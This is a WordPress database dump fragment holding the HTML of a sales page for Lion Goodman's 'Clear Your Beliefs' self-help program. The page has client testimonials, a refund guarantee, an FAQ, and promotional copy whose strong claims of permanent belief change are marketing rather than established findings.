for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>\n&nbsp;', 'Partners', '', 'inherit', 'open', 'open', '', '2161-revision-v1', '', '', '2015-05-12 13:01:43', '2015-05-12 18:01:43', '', 2161, 'http://clearyourbeliefs.com/2161-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2173, 2, '2015-05-12 13:19:52', '2015-05-12 18:19:52', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n<p></p>\n\n<p></p>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" 